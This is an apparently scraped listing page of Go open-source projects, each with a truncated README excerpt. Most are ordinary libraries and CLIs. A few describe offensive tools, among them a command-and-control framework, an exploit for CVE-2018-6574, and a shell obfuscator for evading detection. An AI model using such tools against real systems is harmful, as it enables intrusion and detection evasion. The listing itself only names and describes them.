goArgonPass Travis: Drone: All hashing and crypto is done by Go library packages. This is only a utility package to make the process described easier.

Sep 27, 2022
This is a simple version of user profile using Echo app.
 This is a simple version of user profile using Echo app.

Overview It's an API of simple profile to CRUD profile user based on Echo framework. How to run it Run the application using the command in the termin

Nov 3, 2021
A Flask-based HTTP(S) command and control (C2) framework with a web frontend. Malleable agents written in Go and scripts written in bash.

▄▄▄▄ ██▓ █████▒██▀███ ▒█████ ██████ ▄▄▄█████▓ ▓█████▄ ▓██▒▓██ ▒▓██ ▒ ██▒▒██▒ ██▒▒██ ▒ ▓ ██▒ ▓▒ ▒██▒ ▄██▒██▒▒████ ░▓██ ░▄█ ▒▒██░ ██▒░

Dec 24, 2022
Serpscan is a powerfull php script designed to allow you to leverage the power of dorking straight from the comfort of your command line.
 Serpscan is a powerfull php script designed to allow you to leverage the power of dorking straight from the comfort of your command line.

SerpScan Serpscan is a powerful PHP tool designed to allow you to leverage the power of dorking straight from the comfort of your command line. Table

Nov 11, 2022
A fast port scanner written in go with a focus on reliability and simplicity. Designed to be used in combination with other tools for attack surface discovery in bug bounties and pentests
 A fast port scanner written in go with a focus on reliability and simplicity. Designed to be used in combination with other tools for attack surface discovery in bug bounties and pentests

Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple to

Dec 31, 2022
SingularityCE is the Community Edition of Singularity, an open source container platform designed to be simple, fast, and secure.

SingularityCE Guidelines for Contributing Pull Request Template Project License Documentation Support Citation SingularityCE is the Community Edition

Jan 5, 2023
📧 A go package for writing postfix policy servers
 📧 A go package for writing postfix policy servers

postfix-policy-server postfix-policy-server (or short: pps) provides a simple framework to create Postfix SMTP Access Policy Delegation Servers Server

Mar 12, 2022
Utility to safely fetch Java class files being served by LDAP servers. Includes deobfuscator for common Log4J URL obfuscation techniques

ldap-get Utility to safely fetch Java class files being served by LDAP servers,

Nov 9, 2022
An authorization library that supports access control models like ACL, RBAC, ABAC in Golang
 An authorization library that supports access control models like ACL, RBAC, ABAC in Golang

Casbin News: still worry about how to write the correct Casbin policy? Casbin online editor is coming to help! Try it at: https://casbin.org/editor/ C

Jan 6, 2023
Exploit for remote command execution in Golang go get command.

CVE-2018-6574 Exploit for remote command execution in Golang go get command. Introduction When you go get a package, Go is designed to build and insta

Oct 15, 2021
Terraform provider for Policy Sentry (IAM least privilege generator and auditor)

terraform-provider-policyguru This is the Terraform Provider for Policy Sentry - the IAM Least Privilege Policy Generator. We have Policy Sentry hoste

Jun 6, 2022
Password generator written in Go

go-generate-password Password generator written in Go. Use as a library or as a CLI. Usage CLI go-generate-password can be used on the cli, just insta

Dec 19, 2022
A mobile security hash generator using golang

Mobile Security Hash Generator Project scope This little script is my first experiment using Go. I wrote it for my friend @marcotrumpet because he nee

Oct 10, 2022
Volana - Shell command obfuscation to avoid detection systems
 Volana - Shell command obfuscation to avoid detection systems

volana (moon in malagasy) { Use it ; ??(hide from); ??(detected by) } Shell comm

Nov 9, 2022
Doctl: A command-line interface (CLI) for the DigitalOcean API

doctl doctl is a command-line interface (CLI) for the DigitalOcean API. Usage:

Feb 16, 2022
"I do" stops interactive command if there is any potential risky pattern

Description ido (I do) executes your shell command provided as its input, but it may wait for you to confirm when there is some potential risky patter

Jan 2, 2023
DockerSlim (docker-slim): Don't change anything in your Docker container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source)
 DockerSlim (docker-slim): Don't change anything in your Docker container image and minify it by up to 30x (and for compiled languages even more) making it secure too! (free and open source)

Minify and Secure Docker containers (free and open source!) Don't change anything in your Docker container image and minify it by up to 30x making it

Dec 27, 2022
A simple, modern and secure encryption tool (and Go library) with small explicit keys, no config options, and UNIX-style composability.

age age is a simple, modern and secure file encryption tool, format, and library. It features small explicit keys, no config options, and UNIX-style c

Dec 28, 2022
CLI client (and Golang module) for deps.dev API. Free access to dependencies, licenses, advisories, and other critical health and security signals for open source package versions.
 CLI client (and Golang module) for deps.dev API. Free access to dependencies, licenses, advisories, and other critical health and security signals for open source package versions.

depsdev CLI client (and Golang module) for deps.dev API. Free access to dependencies, licenses, advisories, and other critical health and security sig

May 11, 2023